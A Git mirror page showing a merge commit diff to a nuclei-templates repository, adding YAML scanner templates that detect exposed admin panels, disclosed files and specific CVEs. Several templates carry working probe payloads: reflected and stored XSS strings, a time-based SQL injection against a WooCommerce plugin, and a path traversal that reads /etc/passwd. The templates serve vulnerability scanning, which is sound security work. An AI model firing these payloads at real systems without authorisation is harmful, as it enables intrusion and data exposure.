daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'projectdiscovery:master' into master

patch-1
kh4sh3i 2022-10-25 14:41:21 +03:30 committed by GitHub
parent be5980e6a0 07962cd310
commit edebe08ef9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
29 changed files with 781 additions and 62 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

63
.new-additions
View File

@ -1,40 +1,23 @@
cves/2021/CVE-2021-33851.yaml
cves/2022/CVE-2022-0885.yaml
cves/2022/CVE-2022-1574.yaml
cves/2022/CVE-2022-28290.yaml
cves/2022/CVE-2022-33901.yaml
cves/2022/CVE-2022-41473.yaml
default-logins/dataiku/dataiku-default-login.yaml
exposed-panels/bmc/bmc-discovery-panel.yaml
exposed-panels/dataiku-panel.yaml
exposed-panels/hypertest-dashboard.yaml
exposed-panels/novnc-login-panel.yaml
exposed-panels/opengear-panel.yaml
exposed-panels/piwigo-panel.yaml
exposed-panels/processwire-login.yaml
exposed-panels/qlik-sense-server.yaml
exposed-panels/retool-login.yaml
exposed-panels/sonic-wall-application.yaml
exposed-panels/totemomail-panel.yaml
exposures/configs/cakephp-config.yaml
exposures/files/go-mod-disclosure.yaml
exposures/files/travis-ci-disclosure.yaml
exposures/tokens/loqate/loqate-api-key.yaml
misconfiguration/iot-vdme-simulator.yaml
misconfiguration/springboot/springboot-auditevents.yaml
misconfiguration/springboot/springboot-features.yaml
misconfiguration/springboot/springboot-jolokia.yaml
misconfiguration/springboot/springboot-logfile.yaml
misconfiguration/springboot/springboot-loggerconfig.yaml
misconfiguration/springboot/springboot-status.yaml
network/detection/gnu-inetutils-ftpd-detect.yaml
network/detection/mikrotik-ftp-server-detect.yaml
network/detection/proftpd-server-detect.yaml
network/detection/xlight-ftp-service-detect.yaml
ssl/weak-cipher-suites.yaml
takeovers/surveysparrow-takeover.yaml
technologies/joomla-detect.yaml
technologies/open-journal-systems.yaml
technologies/oracle/oracle-atg-commerce.yaml
vulnerabilities/other/aerocms-sqli.yaml
vulnerabilities/other/xenmobile-server-log4j.yaml
cves/2022/CVE-2022-1007.yaml
cves/2022/CVE-2022-1057.yaml
cves/2022/CVE-2022-41840.yaml
exposed-panels/code-server-login.yaml
exposed-panels/git-repository-browser.yaml
exposed-panels/gitblit-panel.yaml
exposed-panels/maestro-login-panel.yaml
exposed-panels/openfire-admin-panel.yaml
exposed-panels/openvpn-admin.yaml
exposed-panels/openvpn-connect.yaml
exposed-panels/openvpn-router-management.yaml
exposed-panels/superset-login.yaml
exposed-panels/temenos-t24-login.yaml
exposed-panels/turnkey-openvpn.yaml
exposed-panels/xeams-admin-console.yaml
exposures/files/cargo-lock-package.yaml
exposures/files/cargo-toml-file.yaml
exposures/files/db-xml-file.yaml
misconfiguration/cadvisor-exposure.yaml
misconfiguration/express-stack-trace.yaml
network/detection/vmware-authentication-daemon-detect.yaml
technologies/express-default-page.yaml
token-spray/api-nytimes.yaml

12
cves/2022/CVE-2022-0928.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2022-0928
info:
name: Microweber <1.2.12 - Stored Cross-Site Scripting
name: Microweber < 1.2.12 - Stored Cross-Site Scripting
author: amit-jd
severity: medium
description: |
@ -16,8 +16,8 @@ info:
cve-id: CVE-2022-0928
cwe-id: CWE-79
metadata:
verified: "true"
tags: authenticated,huntr,cve,cve2022,xss,microweber,cms
verified: true
tags: cve,cve2022,authenticated,huntr,xss,microweber,cms
requests:
- raw:
@ -36,7 +36,7 @@ requests:
id=0&name=vat1&type="><img+src%3dx+onerror%3dalert(document.domain)>&rate=10
- |-
- |
POST /module HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
@ -49,9 +49,9 @@ requests:
matchers:
- type: dsl
dsl:
- contains(body_3,'<td>\"><img src=x onerror=alert(document.domain)></td>')
- 'contains(body_3,"<img src=x onerror=alert(document.domain)></td>")'
- 'contains(all_headers_3,"text/html")'
- 'status_code==200'
- 'status_code_2 == 200 && status_code_3 == 200'
condition: and
# Enhanced by mp on 2022/09/14

44
cves/2022/CVE-2022-1007.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2022-1007
info:
name: Advanced Booking Calendar < 1.7.1 - Cross-Site Scripting
author: 8arthur
severity: medium
description: |
The Advanced Booking Calendar WordPress plugin before 1.7.1 does not sanitise and escape the room parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue
reference:
- https://wpscan.com/vulnerability/6f5b764b-d13b-4371-9cc5-91204d9d6358
- https://wordpress.org/plugins/advanced-booking-calendar/
- https://nvd.nist.gov/vuln/detail/cve-2022-1007
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-1007
cwe-id: CWE-79
metadata:
verified: "true"
tags: wp-plugin,advanced-booking-calendar,cve,cve2022,wp,authenticated,wpscan,wordpress,xss
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=changeSaved&room=1111%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
req-condition: true
matchers:
- type: dsl
dsl:
- "contains(body_2, '<script>alert(document.domain)</script>')"
- "contains(body_2, 'advanced-booking-calendar')"
- "contains(all_headers_2, 'text/html')"
- "status_code_2 == 200"
condition: and

35
cves/2022/CVE-2022-1057.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2022-1057
info:
name: Pricing Deals for WooCommerce < 2.0.3 - Unauthenticated SQL Injection
author: theamanrawat
severity: critical
description: |
The Pricing Deals for WooCommerce WordPress plugin through 2.0.2.02 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.
reference:
- https://wpscan.com/vulnerability/7c33ffc3-84d1-4a0f-a837-794cdc3ad243
- https://wordpress.org/plugins/pricing-deals-for-woocommerce/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1057
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-1057
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,pricing-deals-for-woocommerce,unauth
requests:
- raw:
- |
@timeout: 15s
GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 500'
- 'contains(body, "been a critical error")'
condition: and

36
cves/2022/CVE-2022-41840.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2022-41840
info:
name: Welcart eCommerce <= 2.7.7 - Unauth Directory Traversal
author: theamanrawat
severity: high
reference:
- https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability
- https://wordpress.org/plugins/usc-e-shop/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41840
classification:
cve-id: CVE-2022-41840
metadata:
verified: true
tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200

30
exposed-panels/code-server-login.yaml Normal file
View File

@ -0,0 +1,30 @@
id: code-server-login
info:
name: Code Server Login
author: tess
severity: info
metadata:
verified: true
shodan-dork: http.title:"code-server login"
tags: panel,detect,misc
requests:
- method: GET
path:
- "{{BaseURL}}/login"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Welcome to code-server"
- "Please log in below. Check the config file at ~/.config/code-server/config.yaml for the password."
condition: and
- type: status
status:
- 200

30
exposed-panels/git-repository-browser.yaml Normal file
View File

@ -0,0 +1,30 @@
id: git-repository-browser
info:
name: Git Repository Browser Detect
author: tess
severity: info
metadata:
verified: true
shodan-dork: http.title:"Git repository browser"
tags: panel,git
requests:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Git repository browser"
- "a fast webinterface for the git dscm"
condition: and
- type: status
status:
- 200

30
exposed-panels/gitblit-panel.yaml Normal file
View File

@ -0,0 +1,30 @@
id: gitblit-panel
info:
name: Gitblit Login Panel Detect
author: tess
severity: info
metadata:
verified: true
shodan-dork: http.title:"Gitblit"
tags: panel,gitblit
requests:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Gitblit</title>"
- "Welcome to Gitblit"
condition: or
- type: status
status:
- 200

30
exposed-panels/maestro-login-panel.yaml Normal file
View File

@ -0,0 +1,30 @@
id: maestro-login-panel
info:
name: Maestro - LuCI Login Panel
author: tess
severity: info
metadata:
verified: true
shodan-dork: http.title:"Maestro - LuCI"
tags: panel,maestro,luci
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/luci"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Maestro - LuCI</title>"
- "Please enter your username and password."
condition: and
- type: status
status:
- 200

30
exposed-panels/openfire-admin-panel.yaml Normal file
View File

@ -0,0 +1,30 @@
id: openfire-admin-panel
info:
name: Openfire Admin Console
author: theamanrawat
severity: info
metadata:
verified: true
shodan-query: http.title:"Openfire Admin Console"
tags: panel,openfire,admin,console
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/login.jsp'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Openfire Admin Console'
- 'Openfire, Version:'
condition: or
- type: status
status:
- 200

31
exposed-panels/openvpn-admin.yaml Normal file
View File

@ -0,0 +1,31 @@
id: openvpn-admin
info:
name: OpenVPN Admin Panel
author: ritikchaddha
severity: info
metadata:
verified: true
shodan-query: http.title:"OpenVPN-Admin"
tags: panel,openvpn,admin,config
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/login'
- '{{BaseURL}}/index.php'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>OpenVPN-Admin'
- '<title>OpenVPN Admin'
condition: or
- type: status
status:
- 200

25
exposed-panels/openvpn-connect.yaml Normal file
View File

@ -0,0 +1,25 @@
id: openvpn-connect
info:
name: OpenVPN Connect Panel
author: ritikchaddha
severity: info
metadata:
verified: true
shodan-query: http.title:"openvpn connect"
tags: panel,openvpn,connect,vpn
requests:
- method: GET
path:
- '{{BaseURL}}/?src=connect'
host-redirects: true
max-redirects: 2
matchers:
- type: word
part: body
words:
- 'content="OpenVPN Connect'
- '<title>OpenVPN Connect</title>'
condition: or

26
exposed-panels/openvpn-router-management.yaml Normal file
View File

@ -0,0 +1,26 @@
id: openvpn-router-management
info:
name: OpenVPN Server Router Management
author: ritikchaddha
severity: low
metadata:
verified: true
shodan-query: http.html:"Router Management - Server OpenVPN"
tags: panel,openvpn,router
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Router Management - Server OpenVPN"
- type: status
status:
- 200

24
exposed-panels/rundeck-login.yaml
View File

@ -1,8 +1,8 @@
id: rundeck-login
info:
name: RunDeck Login
author: DhiyaneshDk
name: RunDeck Login Panel
author: DhiyaneshDk, daffainfo
severity: info
metadata:
verified: true
@ -16,14 +16,24 @@ requests:
host-redirects: true
max-redirects: 2
matchers-condition: or
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Rundeck - Login</title>'
- 'alt="Rundeck"'
- '/assets/rundeck' ## For old rundeck
condition: or
- type: word
- type: status
status:
- 200
extractors:
- type: regex
part: body
words:
- 'RUNDECK ENTERPRISE - Login</title>'
group: 1
regex:
- 'utm_medium=([0-9.]+)-'
- 'data-version-string=\"([0-9.-]+)\"' ## Detection version on old rundeck
- '<span class="version">([0-9.-]+)<\/span>' ## Detection on very old rudneck

35
exposed-panels/superset-login.yaml Normal file
View File

@ -0,0 +1,35 @@
id: superset-login
info:
name: Superset Login
author: DhiyaneshDk
severity: info
metadata:
verified: true
shodan-query: http.favicon.hash:1582430156
tags: panel,superset
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/login'
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'alt="Superset"'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

31
exposed-panels/temenos-t24-login.yaml Normal file
View File

@ -0,0 +1,31 @@
id: temenos-t24-login
info:
name: Temenos T24/Transact Login Pagel
author: korteke
severity: info
description: Exposed Temenos T24 login panel
reference:
- https://www.temenos.com/products/transact/
metadata:
verified: true
shodan-query: http.title:"t24 sign in"
tags: panel,exposure,temenos
requests:
- method: GET
path:
- "{{BaseURL}}/servlet/BrowserServlet"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>T24 Sign in</title>'
- 'value="CREATE.SESSION"'
condition: and
- type: status
status:
- 200

28
exposed-panels/turnkey-openvpn.yaml Normal file
View File

@ -0,0 +1,28 @@
id: turnkey-openvpn
info:
name: TurnKey OpenVPN Panel
author: ritikchaddha
severity: info
metadata:
verified: true
shodan-query: http.title:"TurnKey OpenVPN"
tags: panel,openvpn,turnkey,webshell,vpn
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'TurnKey OpenVPN'
- 'Web Shell'
condition: and
- type: status
status:
- 200

30
exposed-panels/xeams-admin-console.yaml Normal file
View File

@ -0,0 +1,30 @@
id: xeams-admin-console
info:
name: Xeams Admin Console
author: theamanrawat
severity: info
metadata:
verified: true
shodan-query: http.title:"Xeams Admin"
tags: panel,xeams,admin,console
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/FrontController'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Xeams Admin Console'
- 'eXtended Email And Messaging Server</span>'
condition: or
- type: status
status:
- 200

30
exposures/files/cargo-lock-package.yaml Normal file
View File

@ -0,0 +1,30 @@
id: cargo-lock-package
info:
name: Cargo Lock Packages Disclosure
author: DhiyaneshDk
severity: info
reference:
- https://raw.githubusercontent.com/maurosoria/dirsearch/master/db/dicc.txt
metadata:
verified: true
shodan-query: html:"Cargo.lock"
tags: exposure,files,cargo
requests:
- method: GET
path:
- '{{BaseURL}}/Cargo.lock'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "[[package]]"
- "dependencies = ["
condition: and
- type: status
status:
- 200

30
exposures/files/cargo-toml-file.yaml Normal file
View File

@ -0,0 +1,30 @@
id: cargo-toml-file
info:
name: Cargo TOML File Disclosure
author: DhiyaneshDk
severity: info
reference:
- https://doc.rust-lang.org/cargo/reference/manifest.html
metadata:
verified: true
shodan-query: html:"Cargo.toml"
tags: exposure,files,cargo
requests:
- method: GET
path:
- '{{BaseURL}}/Cargo.toml'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "[package]"
- "[dependencies]"
condition: and
- type: status
status:
- 200

30
exposures/files/db-xml-file.yaml Normal file
View File

@ -0,0 +1,30 @@
id: db-xml-file
info:
name: db.xml File Exposure
author: tess
severity: medium
metadata:
verified: true
tags: misconfig,db,files,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/db.xml"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<ServerName>"
- "<DBPASS>"
- "<DBtype>"
condition: and
- type: status
status:
- 200

31
misconfiguration/cadvisor-exposure.yaml Normal file
View File

@ -0,0 +1,31 @@
id: cadvisor-exposure
info:
name: cAdvisor Exposure
author: DhiyaneshDk
severity: medium
metadata:
verified: true
shodan-query: title:"cAdvisor"
tags: exposure,misconfig,dashboard
requests:
- method: GET
path:
- '{{BaseURL}}/containers/'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>cAdvisor - /</title>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

33
misconfiguration/express-stack-trace.yaml Normal file
View File

@ -0,0 +1,33 @@
id: express-stack-trace
info:
name: Express Stack Trace
author: DhiyaneshDk
severity: low
metadata:
verified: true
shodan-query: html:"Welcome to Express"
tags: misconfig,express
requests:
- method: GET
path:
- '{{BaseURL}}/{{randstr}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "NotFoundError: Not Found"
- "at Function.handle"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 404

2
misconfiguration/http-missing-security-headers.yaml
View File

@ -6,7 +6,7 @@ info:
severity: info
description: |
This template searches for missing HTTP security headers. The impact of these missing headers can vary.
tags: misconfig,generic
tags: misconfig,headers,generic
requests:
- method: GET

32
network/detection/vmware-authentication-daemon-detect.yaml Normal file
View File

@ -0,0 +1,32 @@
id: vmware-authentication-daemon
info:
name: VMware Authentication Daemon Detection
author: pussycat0x
severity: info
description: |
vmauthd is the VMWare authentication daemon that is included with many VMWare products, including ESX(i), and Workstation.
metadata:
verified: true
shodan-query: 'product:"VMware Authentication Daemon"'
tags: network,vmware,authenticated
network:
- inputs:
- data: "\n"
host:
- "{{Hostname}}"
- "{{Host}}:902"
matchers:
- type: word
words:
- "ServerDaemonProtocol:SOAP"
- "MKSDisplayProtocol:VNC"
condition: and
extractors:
- type: regex
regex:
- "VMware Authentication Daemon Version ([0-9.]+)"

33
technologies/express-default-page.yaml Normal file
View File

@ -0,0 +1,33 @@
id: express-default-page
info:
name: Express Default Page
author: DhiyaneshDk
severity: info
metadata:
verified: true
shodan-query: html:"Welcome to Express"
tags: tech,express
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Express</title>"
- "Welcome to Express"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

1
technologies/nextcloud-detect.yaml
View File

@ -18,6 +18,7 @@ requests:
path:
- '{{BaseURL}}'
- '{{BaseURL}}/login'
- '{{BaseURL}}/nextcloud/login'
- '{{BaseURL}}/nextcloud/index.php/login'
stop-at-first-match: true

25
technologies/wordpress-detect.yaml
View File

@ -1,23 +1,24 @@
id: wordpress-detect
info:
name: WordPress Detection
author: pdteam
name: WordPress Detect
author: pdteam,daffainfo
severity: info
metadata:
verified: true
shodan-query: http.component:"WordPress"
tags: tech,wordpress
tags: tech,wordpress,cms,wp
requests:
- method: GET
path:
- "{{BaseURL}}"
- '{{BaseURL}}'
- '{{BaseURL}}/feed/'
- '{{BaseURL}}/?feed=rss2' #alternative if /feed/ is blocked
host-redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
regex:
- '<link[^>]+s\d+\.wp\.com'
@ -25,6 +26,14 @@ requests:
- '<!--[^>]+WP-Super-Cache'
condition: or
- type: word
part: body
words:
- '<generator>'
- '<link>'
- '<title>'
condition: and
- type: word
words:
- 'wp-login.php'
@ -38,4 +47,4 @@ requests:
- type: regex
group: 1
regex:
- 'content="WordPress ([0-9.]+)"'
- '(?m)https:\/\/wordpress.org\/\?v=([0-9.]+)'

26
token-spray/api-nytimes.yaml Normal file
View File

@ -0,0 +1,26 @@
id: api-nytimes
info:
name: NYTimes API Test
author: daffainfo
severity: info
description: NYTimes API Test
reference:
- https://developer.nytimes.com/apis
tags: token-spray,nytimes
self-contained: true
requests:
- raw:
- |
GET https://api.nytimes.com/svc/mostpopular/v2/shared/1.json?api-key={{token}} HTTP/1.1
Host: api.nytimes.com
matchers:
- type: word
part: body
words:
- '"status":'
- '"copyright":'
- '"num_results":'
condition: and